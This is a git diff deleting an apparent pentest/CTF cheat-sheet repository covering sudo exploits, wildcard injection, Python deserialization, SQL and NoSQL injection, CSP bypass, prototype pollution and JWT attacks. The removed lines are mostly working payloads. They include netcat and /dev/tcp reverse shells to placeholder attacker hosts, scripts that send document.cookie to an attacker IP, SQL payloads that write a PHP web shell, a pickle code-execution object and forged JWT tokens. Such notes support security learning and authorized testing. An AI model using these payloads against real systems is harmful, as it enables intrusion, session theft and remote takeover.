-sudo -u#-1 <app>
-```
diff --git a/exploit/linux/sudo/CVE_2019_18634.md b/exploit/linux/sudo/CVE_2019_18634.md
deleted file mode 100644
index a78fb18..0000000
--- a/exploit/linux/sudo/CVE_2019_18634.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# Sudo pwnge with pwfeedback()
-
-* Sudo version 1.7.1 to 1.8.30
-* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)
diff --git a/exploit/linux/sudo/baron_samedit.md b/exploit/linux/sudo/baron_samedit.md
deleted file mode 100644
index 5e76a4e..0000000
--- a/exploit/linux/sudo/baron_samedit.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# CVE-2021-3156 Baron Samedit
-
-* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
-* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
-* Heap based overflow
-* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
-* Check vulnerability via
-```sh
-sudoedit -s '\' $(python -c "print('\x41' * 10000)")
-```
-* Defaults to try
-```sh
-./brute.sh 90 120 50 70 150 300
-```
diff --git a/exploit/linux/sudo/tokens.md b/exploit/linux/sudo/tokens.md
deleted file mode 100644
index 8dce3d0..0000000
--- a/exploit/linux/sudo/tokens.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# Reusing Sudo Token
-
-* Reuse sudo token of currently logged in user
-* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
-
-* `ptrace` has to be fully enabled
-```sh
-cat /proc/sys/kernel/yama/ptrace_scope
-0
-```
-* sudo has to be triggered the last 15 minutes, check `ps wuax`
-* `gdb` has to be installed
-* One must be logged in as the same user which should be owned
-* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)
diff --git a/exploit/linux/wildard_exploitation.md b/exploit/linux/wildard_exploitation.md
deleted file mode 100644
index d48d004..0000000
--- a/exploit/linux/wildard_exploitation.md
+++ /dev/null
@@ -1,26 +0,0 @@
-# Wildcard usage
-* [Leon Juranic has shown it](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
-
-## Another Example
-
-* cronjob gets backup data from `/var/www/html` via `tar cf backup.tar *`. The reverse shell and the parameters need to be files in this directory to get called by tar and be executed.
-
-```sh
-echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > shell.sh
-echo "" > "--checkpoint-action=exec=sh shell.sh"
-echo "" > "--checkpoint=1"
-```
-or 
-```sh
-echo "mkfifo /tmp/oytqnhq; nc <IP> <PORT> 0</tmp/oytqnhq | /bin/sh >/tmp/oytqnhq 2>&1; rm /tmp/oytqnhq" > /var/www/html/shell.sh
-touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
-touch "/var/www/html/--checkpoint=1"
-```
-
-## touched Filename Options
-
-* Give full permissions on all the files
-```sh
-touch './"";$(chmod 777 *)'
-```
-
diff --git a/exploit/macOS/DS_Store_crawler_parser b/exploit/macOS/DS_Store_crawler_parser
deleted file mode 160000
index 9e003a3..0000000
--- a/exploit/macOS/DS_Store_crawler_parser
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be
diff --git a/exploit/macOS/Python-dsstore b/exploit/macOS/Python-dsstore
deleted file mode 160000
index 859781b..0000000
--- a/exploit/macOS/Python-dsstore
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 859781b834244774cb509e96ccc29ee646f72739
diff --git a/exploit/macOS/ds_store_exp b/exploit/macOS/ds_store_exp
deleted file mode 160000
index 784eada..0000000
--- a/exploit/macOS/ds_store_exp
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7
diff --git a/exploit/network/mac_spoofing.md b/exploit/network/mac_spoofing.md
deleted file mode 100644
index cedbee5..0000000
--- a/exploit/network/mac_spoofing.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# MAC Spoofing
-
-```sh
-macof -i <interface>
-```
-or
-```sh
-ettercap -T -i <interface> -P rand_flood -q -w file.pcap
-```
diff --git a/exploit/padding/PadBuster b/exploit/padding/PadBuster
deleted file mode 160000
index 50e4a3e..0000000
--- a/exploit/padding/PadBuster
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 50e4a3e2bf5dfff5699440b3ebc61ed1b5c49bbe
diff --git a/exploit/padding/padbuster.md b/exploit/padding/padbuster.md
deleted file mode 100644
index a447b9e..0000000
--- a/exploit/padding/padbuster.md
+++ /dev/null
@@ -1,16 +0,0 @@
-# PadBuster
-
-* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)
-
-* Padding Oracle
-
-## Usage on Cookies
-
-* Oracle on cookievalue, use website error message of invalid padding
-* A high privileged user account can be added as a target
-```sh
- ./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
-```sh
- ./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
-```
-
diff --git a/exploit/python/code_injection.md b/exploit/python/code_injection.md
deleted file mode 100644
index fc2b2e2..0000000
--- a/exploit/python/code_injection.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Code Injection
-
-* Python's `input()`, `exec()` and `eval()` makes it possible
-
-## Usage
-
-* Payload example
-```python
-eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")
-```
diff --git a/exploit/python/flask_cookie_decode.py b/exploit/python/flask_cookie_decode.py
deleted file mode 100644
index d6f9a49..0000000
--- a/exploit/python/flask_cookie_decode.py
+++ /dev/null
@@ -1,36 +0,0 @@
-import zlib
-import sys
-import json
-from itsdangerous import base64_decode
-
-
-def decode(cookie):
-    """
-    Decode a Flask cookie
-
-    https://www.kirsle.net/wizards/flask-session.cgi
-    """
-    try:
-        compressed = False
-        payload = cookie
-
-        if payload.startswith('.'):
-            compressed = True
-            payload = payload[1:]
-
-        data = payload.split(".")[0]
-
-        data = base64_decode(data)
-        if compressed:
-            data = zlib.decompress(data)
-
-        return data.decode("utf-8")
-    except Exception as e:
-        return f"[Decoding error: are you sure this was a Flask session cookie? {e}]"
-
-
-cookie = sys.argv[1]
-data = decode(cookie)
-json_data = json.loads(data)
-pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": "))
-print(pretty)
diff --git a/exploit/python/jail_escape.md b/exploit/python/jail_escape.md
deleted file mode 100644
index 95d40d0..0000000
--- a/exploit/python/jail_escape.md
+++ /dev/null
@@ -1,18 +0,0 @@
-# Escaping Jails
-
-* [Aneesh's blog](https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831)
-
-## Usage
-
-* Circumvent via `__builtins__`
-```python
-dir(__builtins__)
-```
-```python
-__builtins__.__dict__
-```
-* Call builtins
-```python
-__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash -p')
-```
-
diff --git a/exploit/python/lib_hijack.md b/exploit/python/lib_hijack.md
deleted file mode 100644
index 81de964..0000000
--- a/exploit/python/lib_hijack.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Library Hijacking
-
-* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8)
-
-## Interpreter might be called invoking sudo 
-* Write into a library called inside the script
-
-## Path call order of packages
-* Order of paths which are invoked to find packages may be found via
-```sh
-python -c 'import sys; print("\n".join(sys.path))'
-```
-* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script.
-* The highest order is `pwd`
-
-## Redirecting PYTHONPATH 
-* `SETENV` may be set while loading script through `sudo`
-```sh
-sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 <script.py>
-```
-
-
diff --git a/exploit/python/pickle.md b/exploit/python/pickle.md
deleted file mode 100644
index a9de31e..0000000
--- a/exploit/python/pickle.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Pickle
-
-## Payload
-* Inject payload  
-```python
-import pickle
-import os
-import base64
-class evil_object(object):
-    def __reduce__(self):
-        return(os.system, ('/bin/bash',))
-x = evil_object()
-x = evil_object()
-y = pickle.dumps(x)
-base64.b64encode(y)
-```
-
-* Dump serialized object via
-```python
-pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
-```
diff --git a/exploit/python/pwntools.md b/exploit/python/pwntools.md
deleted file mode 100644
index 9384c4f..0000000
--- a/exploit/python/pwntools.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# Pwntools
-
-* [Docs](https://docs.pwntools.com/en/stable/)
diff --git a/exploit/python/pyc.md b/exploit/python/pyc.md
deleted file mode 100644
index 0fc6680..0000000
--- a/exploit/python/pyc.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# Decompile PYC
-
-```sh
-uncompyle6 file.pyc
-```
diff --git a/exploit/python/scapy.md b/exploit/python/scapy.md
deleted file mode 100644
index dcd3101..0000000
--- a/exploit/python/scapy.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# Scapy
-
-* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html)
-
diff --git a/exploit/samba/smbmap b/exploit/samba/smbmap
deleted file mode 160000
index 5c98c5f..0000000
--- a/exploit/samba/smbmap
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003
diff --git a/exploit/samba/smbmap.md b/exploit/samba/smbmap.md
deleted file mode 100644
index 505eaec..0000000
--- a/exploit/samba/smbmap.md
+++ /dev/null
@@ -1,12 +0,0 @@
-# smbmap
-
-* [Repo](https://github.com/ShawnDEvans/smbmap.git)
-* `python3 -m pip install -r requirements.txt`
-
-# Usage
-* `-x` execute command on server
-* `-s` enumerate share
-
-```sh
-smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
-```
diff --git a/exploit/sqli/mssql.md b/exploit/sqli/mssql.md
deleted file mode 100644
index b175ec0..0000000
--- a/exploit/sqli/mssql.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# MSSQL
-
-# Usage
-
-* `sqsh` as a shell
-* After connection is established check `xp_cmdshell'
-```sh
-xp_cmdshell 'whoami';
-```
diff --git a/exploit/sqli/no_sqli.md b/exploit/sqli/no_sqli.md
deleted file mode 100644
index b75f00f..0000000
--- a/exploit/sqli/no_sqli.md
+++ /dev/null
@@ -1,38 +0,0 @@
-# NoSQL Injections
-
-* No tables, but files (collections)
-* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
-
-## Querying
-* Filter instead of SQL queries
-* [Redis docs](https://redis.io/documentation)
-* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
-* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
-
-# Operators
-* Most common
-```sql
-$and
-$or
-$eq
-$ne
-$gt
-$where
-$exists
-$regex
-```
-
-## Tips & Tricks
-
-* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
-    * 2D array via `user[$nin][]=foo`
-
-## Example
-* POST or GET parameters
-```sh
-username=admin&password[$ne]=admin
-```
-* JSON
-```json
-{"username":"user","password":{"$ne":""} }
-```
diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md
deleted file mode 100644
index 27c9ab1..0000000
--- a/exploit/sqli/sqli.md
+++ /dev/null
@@ -1,157 +0,0 @@
-# SQL Injection
-
-* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)
-
-## Finding an Opportunity
-* GET parameter
-```sh
-http://example.com/index.php?id=' or 1=1 -- -
-```
-* Sometimes an ID or may come first
-```sh
-http://example.com/index.php?id=10 or 1=1 -- +
-http://example.com/index.php?id=10' or '1'='1'-- -
-http://example.com/index.php?id=-1' or 1=1 -- -&password=x
-```
-* Provoke error to gain information
-```sh
-http://example.com/index.php?id='
-```
-* **Incase of client side sanitization craft the URL instead of using the form!!!**
-
-## Usage
-* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
-```sql
-SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
-SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
-```
-
-### Boolean True and False
-```sql
-SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
-SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
-```
-* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
-```sql
-' UNION SELECT null,null,null where database() like 'da%';-- -
-```
-
-### Time based
-* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
-```sql
-' union select sleep(3), null; -- -
-```
-
-### Blind injection // Guessing characters
-```sh
-http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
-```
-```sh
-http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
-```
-* Function substr(string, start, length)
-* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 
-
-### Union based
-* _First method__ check by order until error occurs
-```sql
-' order by 1 -- -
-' order by 2 -- -
-' order by 3 -- -
-```
-* __Second method__ fuzzing NULL values, followed by fuzzing data types
-* Check number of cols
-```sql
-' UNION SELECT NULL--
-' UNION SELECT NULL,NULL--
-' UNION SELECT NULL,NULL,NULL--
-# until the error occurs
-```
-* Check which one is a string
-```sql
-' UNION SELECT 'a',NULL,NULL,NULL--
-' UNION SELECT NULL,'a',NULL,NULL--
-' UNION SELECT NULL,NULL,'a',NULL--
-' UNION SELECT NULL,NULL,NULL,'a'--
-```
-* Retrieve content, for cols and comment two times as an example. Or dump database
-```sql
-' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
-' UNION SELECT NULL,username,password,NULL FROM users -- //
-```
-
-* Retrieve content by union poking the count and order, afterwards extracting tables via
-```sh
-0 union select null, null, database()
-0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
-0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
-0 union select null, null, group_concat(username, ':', password from found_tablename
-```
-
-* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
-
-### Identify Database 
-```sh
-id=sqlite_version()
-id=@@version # mysql/mssql
-id=(SELECT banner FROM v$version) # oracle
-```
-
-#### SQL Functions
-* Use sql functions to fumble the tables & cols via union
-* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
-* Extract tables 
-```sql
-1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
-```
-* sqlite specific
-```sql
-' UNION SELECT sql, sql FROM sqlite_master -- -
-```
-```sql
-(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
-(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
-```
-* Extract cols
-```sh
-1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
-```
-* Data from cols
-```sql
-1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
-```
-
-## Insert
-
-* Check user file permissions
-```sql
-union all select 1,group_concat(user,0x3a,file_priv),3,4 from mysql.user -- -
-```
-
-* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
-```sql
-<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
-```
-
-* Insert `<?php system($_GET["cmd"]); ?>` 
-```sql
-" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '/var/www/html/shell.php' -- -
-```
-
-### Examples
-* sqli inside HTTP request to an API. Five values inside select have been discovered before
-```HTTP
-GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
-```
-    * Get col names 
-    ```HTTP
-    GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
-    ```
-    * Get notes from users by id 
-    ```HTTP
-    GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
-    ```
-
-## Payloads
-* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
-
diff --git a/exploit/sqli/sqlmap.md b/exploit/sqli/sqlmap.md
deleted file mode 100644
index 56b26e0..0000000
--- a/exploit/sqli/sqlmap.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# SQLmap
-
-
-* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
-* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
-* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
-
-## Usage
-
-* Use `-r` with a saved HTTP request 
-```sh
-sqlmap -r request.txt --dbms=mysql --dump
-sqlmap -r request.txt --batch
-```
-* Select form data automatically
-```sh
-sqlmap -u http://<target-IP>/site.php --forms --dump-all
-```
-* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
-
-
-|Parameter|Details|
-|-r|Uses the intercepted request save as a file|
-|--dbms|DBMS of target|
-|--dump|Dump the entire database|
-|--dump-all|Dump everything|
-|-p |TESTPARAMETER|
-|--os-shell|Prompt for an interactive operating system shell|
-|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
-|--tables|Show tables|
-|-T|Specify table|
-
-## Other Tools
-
-### Damn Small SQLi Scanner (DSSS)
-* [Script](https://github.com/stamparm/DSSS.git)
-```sh
-python dsss.py -u "http://example.com/index.php?id="
-```
-
-### Online sqlmap
-* [Link](https://suip.biz/?act=sqlmap)
-
diff --git a/exploit/ssl_tls/heartbleed.md b/exploit/ssl_tls/heartbleed.md
deleted file mode 100644
index 23cded6..0000000
--- a/exploit/ssl_tls/heartbleed.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# Heartbleed
-
-* SSL V1.0.1 and V1.0.1f
-* Client sends msg, msglength
-* If msg is 0 and the msglength is longer, return from server is arbitrary memory content
-
-* [Heartbleed](https://heartbleed.com)
-
diff --git a/exploit/web/beef b/exploit/web/beef
deleted file mode 160000
index 72261c4..0000000
--- a/exploit/web/beef
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 72261c4fcd39601effa474274608347033e1d492
diff --git a/exploit/web/bypass_rate_limiting/bypass_rate_limiting.md b/exploit/web/bypass_rate_limiting/bypass_rate_limiting.md
deleted file mode 100644
index dc4d192..0000000
--- a/exploit/web/bypass_rate_limiting/bypass_rate_limiting.md
+++ /dev/null
@@ -1,18 +0,0 @@
-# Bypassing Rate Limit
-
-* [Infosecwriteups article](https://infosecwriteups.com/bypassing-rate-limit-like-a-pro-5f3e40250d3c)
-* [Another infosecwriteups article](https://infosecwriteups.com/no-rate-limit-use-like-a-pro-33fc76744a17)
-* [Hacktricks' site](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass)
-
-# Usage
-
-* Add one of the following lines to the header in round robin
-```sh
-X-Originating-IP: 127.0.0.1
-X-Forwarded-For: 127.0.0.1
-X-Remote-IP: 127.0.0.1
-X-Remote-Addr: 127.0.0.1
-X-Client-IP: 127.0.0.1
-X-Host: 127.0.0.1
-X-Forwared-Host: 127.0.0.1
-```
diff --git a/exploit/web/command_injection.md b/exploit/web/command_injection.md
deleted file mode 100644
index 80fd02c..0000000
--- a/exploit/web/command_injection.md
+++ /dev/null
@@ -1,19 +0,0 @@
-# Command Injection
-
-* Blind injection
-* Verbose injection
-
-## Blind Injection
-* Check via ping, open a `tcpdump` on ICMP to listen for packets
-* Redirect to logfile and read
-* Use `sleep` or `timeout` to check if ci is possible in general
-
-## Functions
-* Watch out for 
-    * `eval()`
-    * `exec()`
-    * `passthru()`
-    * `system()`
-    
-
-
diff --git a/exploit/web/content_security_policy/JSONBee b/exploit/web/content_security_policy/JSONBee
deleted file mode 160000
index 1a518dd..0000000
--- a/exploit/web/content_security_policy/JSONBee
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 1a518ddf695ae3093ff637c5958802715e890d88
diff --git a/exploit/web/content_security_policy/content_security_policy.md b/exploit/web/content_security_policy/content_security_policy.md
deleted file mode 100644
index 9094c83..0000000
--- a/exploit/web/content_security_policy/content_security_policy.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# Content Security Policy (CSP)
-
-* Either in HTTP header or inside DOM's HTML 
-* [CSP directives](https://content-security-policy.com/#directive)
-* [CSP evaluator](https://csp-evaluator.withgoogle.com/)
-* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/)
-
-## Sources
-* `*` wildcard 
-* `none`
-* `self` for sources delivered through the same protocol
-    * `default-src 'self';` may not load any script
-* `unsafe-inline`
-* `unsafe-eval` 
-* `test.com` loads resources from domain but not subdomains
-* `*.test.com` loads resources from subdomains
-* `data:<content-type>...` critical usage
-* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512`
-    * [style hasher](https://report-uri.com/home/hash)
-
-## Usage 
-
-### JSONP
-Find JSONP endpoints through which to use custom callback functions
-* [JSONBee](https://github.com/zigoo0/JSONBee)
-```sh
-"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
-```
-
-### Misconfiguration
-Insert payload into `src` attribute
-
-### Exfiltration
-* [Beeceptor](beeceptor.com)
-* Local webserver
-* `connect-src` while Ajax/XHR requests are enabled
-* Disguising as an `image-src` or `media-src` source
-```html
-<script>(new Image()).src = `https://example.com/${encodeURIComponent(document.cookie)}`</script>
-```
-other payloads
-```sh
-<link id="csp" rel=stylesheet href="" /><script nonce="abcdef">document.getElementById("csp").href="http://<attacker-IP>:8000/" + document.cookie;</script>
-```
-* 
-```sh
-<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.3/prototype.min.js" integrity="sha512-C4LuwXQtQOF1iTRy3zwClYLsLgFLlG8nCV5dCxDjPcWsyFelQXzi3efHRjptsOzbHwwnXC3ZU+sWUh1gmxaTBA==" crossorigin="anonymous"></script>
-<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.2/angular.min.js"></script>
-<div ng-app ng-csp>
-{{$on.curry.call().document.location='https://<attacker-IP>/' + $on.curry.call().document.cookie}}
-</div>
-```
diff --git a/exploit/web/cookie_tampering.md b/exploit/web/cookie_tampering.md
deleted file mode 100644
index c3063f5..0000000
--- a/exploit/web/cookie_tampering.md
+++ /dev/null
@@ -1,22 +0,0 @@
-# Cookie Tampering
-
-## Components
-
-* Separator is `;`
-* Name
-* Value
-* Domain
-* Path
-* Expires/Maxage
-* Size
-* HttpOnly, no access by client side scripts
-* Secure, HTTPs only
-* SameSite, cookie sent through cross-site request
-* SameParty, firt party requests only
-* Priority
-
-## Response
-* May look like this
-```sh
-Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Secure; HttpOnly
-```
diff --git a/exploit/web/csrf.md b/exploit/web/csrf.md
deleted file mode 100644
index f5768a5..0000000
--- a/exploit/web/csrf.md
+++ /dev/null
@@ -1,11 +0,0 @@
-# CSRF
-
-## Protection
-
-* May be a hidden field with an encoded value
-```html
-    <input type="hidden" name="csrf_protect" value="eyJk..n0=">
-```
-* This field need to be removed in order to do some csrf shenanigans
-* Decode the value to reproduce some valid content.
-
diff --git a/exploit/web/forced_browsing/forced_browsing.md b/exploit/web/forced_browsing/forced_browsing.md
deleted file mode 100644
index 346fa01..0000000
--- a/exploit/web/forced_browsing/forced_browsing.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Forced Browsing
-Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note. 
-
-## Usage
-
-## Tools
-
-### wfuzz
-* `pip install wfuzz`
-
-```
-wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt
-```
-
-|Parameter|Detail|
-|---------|------|
-|-c|Shows the output in color|
-|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with|
-|--hc|Don't show certain http response codes|
-|--hl|Don't show a certain amount of lines in the response|
-|--hh|Don't show a certain amount of words|
-|--hw|Don't show word response   return val of this length|
-
diff --git a/exploit/web/http_header_injection.md b/exploit/web/http_header_injection.md
deleted file mode 100644
index 9ff30aa..0000000
--- a/exploit/web/http_header_injection.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# HTTP Header Injection & Cache Poisoning
-
-## References
-
-* [Portswigger]https://portswigger.net/web-security/host-header
-* [Spring project](https://github.com/spring-projects/spring-security/issues/4310)
-* [Skeletonscribe.com](https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html)
-
diff --git a/exploit/web/idor/idor.md b/exploit/web/idor/idor.md
deleted file mode 100644
index 52f29d3..0000000
--- a/exploit/web/idor/idor.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# Insecure Direct Object Reference (IDOR)
-
-Changing URL parameters.
diff --git a/exploit/web/javascript/bypass_filters.md b/exploit/web/javascript/bypass_filters.md
deleted file mode 100644
index 44df2b0..0000000
--- a/exploit/web/javascript/bypass_filters.md
+++ /dev/null
@@ -1,10 +0,0 @@
-# Client Filters
-
-* Circumvent client side filters via
-    * Disable javascript
-    * Use curl
-```sh
-curl -X POST -F "submit=<value>" -F "<file-parameter>=@<path-to-file>" <site>
-```
-    * Intercept and modify incoming page via Burpsuite
-    * Intercept and modify upload of already loaded page via Burpsuite
diff --git a/exploit/web/javascript/prototype_pollution.md b/exploit/web/javascript/prototype_pollution.md
deleted file mode 100644
index d12f7b7..0000000
--- a/exploit/web/javascript/prototype_pollution.md
+++ /dev/null
@@ -1,31 +0,0 @@
-# Prototype Pollution
-
-* Overwrite built in properties, like constructor, toString of an object.
-* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects.
-## Usage
-* Access to prototype inside object, as an example Javascript
-```javascript
-obj.__proto__
-Object.prototype
-```
-* Create object 
-```javascript
-let obj = {}
-```
-* Create properties inside `__proto__`.
-```javascript
-obj.__proto__.isAdmin = true
-```
-
-### Start Node commands
-* Use 
-    * `require`
-    * `eval`
-
-### Kibana CVE 2019
-* Write reverse bash into variable
-```javascript
-.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp/<attacker-IP>/4444 0>&1\'");//')
-.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
-```
-
diff --git a/exploit/web/jwt/jwt-cracker b/exploit/web/jwt/jwt-cracker
deleted file mode 160000
index 8822dd2..0000000
--- a/exploit/web/jwt/jwt-cracker
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61
diff --git a/exploit/web/jwt/jwt.md b/exploit/web/jwt/jwt.md
deleted file mode 100644
index 4768c79..0000000
--- a/exploit/web/jwt/jwt.md
+++ /dev/null
@@ -1,88 +0,0 @@
-# JSON Web Token
-
-## Build up
-```sh
-header.payload.signature
-```
-
-1.  **Header**:  This consists of the algorithm used and the type of the token.
-```sh
-{  "alg": "HS256", "typ": "JWT"}
-```
-
-2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.
-
-
-3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)
-
-
-## NONE Algorithm Vulnerability
-* Example with `alg: NONE`, so no third part is needed.
-```sh
-eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.
-```
-* Encoded headers are as follows
-    * `{"type": "JWT", "alg": "none"}`
-        ```
-        eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
-        ```
-    * `{"typ":"JWT","alg":"NONE"}` with trailing `\n`
-        ```
-        eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
-        ```
-
-## Brute Force
-```python
-HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
-```
-* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
-
-|Parameter|Details|
-|---------|-------|
-|Token    | The HS256 JWT Token|
-|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")|
-|max-length|Secret max length (default: 12)|
-
-```sh
-[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4
-Attempts: 100000
-Attempts: 200000
-Attempts: 300000
-SECRET FOUND: pass
-Time taken (sec): 11.605
-Attempts: 346830
-```
-## HS256 Vulnerability
-It is calculated by using server `K_pub`, which may be gained via content of the server cert
-
-### Build Up
